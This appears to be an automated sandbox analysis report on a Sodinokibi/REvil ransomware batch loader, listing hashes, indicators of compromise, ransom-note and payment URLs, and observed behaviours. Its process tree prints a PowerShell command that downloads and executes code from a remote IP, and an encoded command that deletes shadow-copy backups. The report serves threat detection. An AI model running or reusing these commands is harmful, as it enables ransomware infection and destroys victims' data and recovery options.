Analysis
-
max time kernel
107s -
max time network
100s -
platform
windows7_x64 -
resource
win7v200217 -
submitted
06-03-2020 05:10
Static task
static1
Behavioral task
behavioral1
Sample
yv3bZq0C.bat
Resource
win7v200217
Behavioral task
behavioral2
Sample
yv3bZq0C.bat
Resource
win10v200217
General
-
Target
yv3bZq0C.bat
-
Size
192B
-
MD5
986293d617a3f38c055066d8971343fc
-
SHA1
04a3044011926264954034bfeb463e7d9334018b
-
SHA256
083231c01b3b9c859b9683303c6bc946c15210cda94df73f79350c94366fd859
-
SHA512
befebd114ce90e8db3d026c2775cf8be09a714b6c2548d3728e7e89a3d01f3a385a3516740e103e380e3c8fb95552fc20103d3745520464e6976c23d777dfc34
Malware Config
Extracted
http://185.103.242.78/pastes/yv3bZq0C
Extracted
C:\w96xs84y4-readme.txt
sodinokibi
http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/E4417BDFD428A681
http://decryptor.cc/E4417BDFD428A681
Signatures
-
Discovering connected drives 3 TTPs 7 IoCs
Processes:
powershell.execmd.exepowershell.exedescription ioc process File opened (read-only) \??\C: powershell.exe File opened (read-only) \??\A: powershell.exe File opened (read-only) \??\B: powershell.exe File opened (read-only) \??\E: powershell.exe File opened (read-only) \??\C: cmd.exe File opened (read-only) \??\F: powershell.exe File opened (read-only) \??\C: powershell.exe -
Sodin,Sodinokibi,REvil
Ransomware with advanced anti-analysis and privilege escalation functionality.
-
Drops file in Program Files directory 33 IoCs
Processes:
powershell.exedescription ioc process File renamed C:\Program Files\EditRepair.mpv2 => \??\c:\program files\EditRepair.mpv2.w96xs84y4 powershell.exe File opened for modification \??\c:\program files\GrantOpen.inf powershell.exe File renamed C:\Program Files\ExpandProtect.ods => \??\c:\program files\ExpandProtect.ods.w96xs84y4 powershell.exe File renamed C:\Program Files\GrantOpen.inf => \??\c:\program files\GrantOpen.inf.w96xs84y4 powershell.exe File renamed C:\Program Files\RestartSave.xltm => \??\c:\program files\RestartSave.xltm.w96xs84y4 powershell.exe File created \??\c:\program files\microsoft sql server compact edition\v3.5\desktop\w96xs84y4-readme.txt powershell.exe File opened for modification \??\c:\program files\DisableCopy.M2T powershell.exe File opened for modification \??\c:\program files\ExpandProtect.ods powershell.exe File opened for modification \??\c:\program files\LockBackup.au powershell.exe File created \??\c:\program files\microsoft sql server compact edition\w96xs84y4-readme.txt powershell.exe File opened for modification \??\c:\program files\SuspendGrant.m4a powershell.exe File renamed C:\Program Files\RestartUninstall.midi => \??\c:\program files\RestartUninstall.midi.w96xs84y4 powershell.exe File created \??\c:\program files (x86)\w96xs84y4-readme.txt powershell.exe File opened for modification \??\c:\program files\SplitRestart.bmp powershell.exe File opened for modification \??\c:\program files\UnpublishConvertTo.rmi powershell.exe File renamed C:\Program Files\SkipApprove.xhtml => \??\c:\program files\SkipApprove.xhtml.w96xs84y4 powershell.exe File renamed C:\Program Files\UnpublishSync.aifc => \??\c:\program files\UnpublishSync.aifc.w96xs84y4 powershell.exe File opened for modification \??\c:\program files\ConvertToFormat.ini powershell.exe File opened for modification \??\c:\program files\EditRepair.mpv2 powershell.exe File opened for modification \??\c:\program files\MoveWait.tif powershell.exe File renamed C:\Program Files\SuspendGrant.m4a => \??\c:\program files\SuspendGrant.m4a.w96xs84y4 powershell.exe File renamed C:\Program Files\SplitRestart.bmp => \??\c:\program files\SplitRestart.bmp.w96xs84y4 powershell.exe File created \??\c:\program files\w96xs84y4-readme.txt powershell.exe File renamed C:\Program Files\ConvertToFormat.ini => \??\c:\program files\ConvertToFormat.ini.w96xs84y4 powershell.exe File renamed C:\Program Files\LockBackup.au => \??\c:\program files\LockBackup.au.w96xs84y4 powershell.exe File opened for modification \??\c:\program files\RestartSave.xltm powershell.exe File created \??\c:\program files\microsoft sql server compact edition\v3.5\w96xs84y4-readme.txt powershell.exe File opened for modification \??\c:\program files\SkipApprove.xhtml powershell.exe File renamed C:\Program Files\MoveWait.tif => \??\c:\program files\MoveWait.tif.w96xs84y4 powershell.exe File opened for modification \??\c:\program files\UnpublishSync.aifc powershell.exe File renamed C:\Program Files\DisableCopy.M2T => \??\c:\program files\DisableCopy.M2T.w96xs84y4 powershell.exe File opened for modification \??\c:\program files\RestartUninstall.midi powershell.exe File renamed C:\Program Files\UnpublishConvertTo.rmi => \??\c:\program files\UnpublishConvertTo.rmi.w96xs84y4 powershell.exe -
Sets desktop wallpaper using registry 2 TTPs 1 IoCs
Processes:
powershell.exedescription ioc process Set value (str) \REGISTRY\USER\S-1-5-21-1848298919-2336104428-4012071465-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\9861h714gsw71.bmp" powershell.exe -
Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs
Processes:
powershell.exepid process 1884 powershell.exe -
Suspicious use of WriteProcessMemory 5 IoCs
Processes:
cmd.exepowershell.exedescription pid process target process PID 1860 wrote to memory of 1884 1860 cmd.exe powershell.exe PID 1884 wrote to memory of 1976 1884 powershell.exe powershell.exe PID 1884 wrote to memory of 1976 1884 powershell.exe powershell.exe PID 1884 wrote to memory of 1976 1884 powershell.exe powershell.exe PID 1884 wrote to memory of 1976 1884 powershell.exe powershell.exe -
Suspicious use of AdjustPrivilegeToken 6 IoCs
Processes:
powershell.exepowershell.exevssvc.exedescription pid process Token: SeDebugPrivilege 1884 powershell.exe Token: SeDebugPrivilege 1884 powershell.exe Token: SeDebugPrivilege 1976 powershell.exe Token: SeBackupPrivilege 1392 vssvc.exe Token: SeRestorePrivilege 1392 vssvc.exe Token: SeAuditPrivilege 1392 vssvc.exe -
Suspicious behavior: EnumeratesProcesses 5 IoCs
Processes:
powershell.exepowershell.exepid process 1884 powershell.exe 1884 powershell.exe 1884 powershell.exe 1976 powershell.exe 1976 powershell.exe -
Blacklisted process makes network request 1 IoCs
Processes:
powershell.exeflow pid process 3 1884 powershell.exe -
Modifies service 2 TTPs 4 IoCs
Processes:
vssvc.exedescription ioc process Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\Registry Writer vssvc.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\COM+ REGDB Writer vssvc.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\ASR Writer vssvc.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\Shadow Copy Optimization Writer vssvc.exe
Processes
-
C:\Windows\system32\cmd.execmd /c "C:\Users\Admin\AppData\Local\Temp\yv3bZq0C.bat"1⤵
- Discovering connected drives
- Suspicious use of WriteProcessMemory
PID:1860 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeC:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "IEX (New-Object System.Net.WebClient).DownloadString('http://185.103.242.78/pastes/yv3bZq0C');Invoke-IAADNEEFN;Start-Sleep -s 10000"2⤵
- Discovering connected drives
- Drops file in Program Files directory
- Sets desktop wallpaper using registry
- Suspicious behavior: CmdExeWriteProcessMemorySpam
- Suspicious use of WriteProcessMemory
- Suspicious use of AdjustPrivilegeToken
- Suspicious behavior: EnumeratesProcesses
- Blacklisted process makes network request
PID:1884 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -e RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA==3⤵
- Discovering connected drives
- Suspicious use of AdjustPrivilegeToken
- Suspicious behavior: EnumeratesProcesses
PID:1976
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Suspicious use of AdjustPrivilegeToken
- Modifies service
PID:1392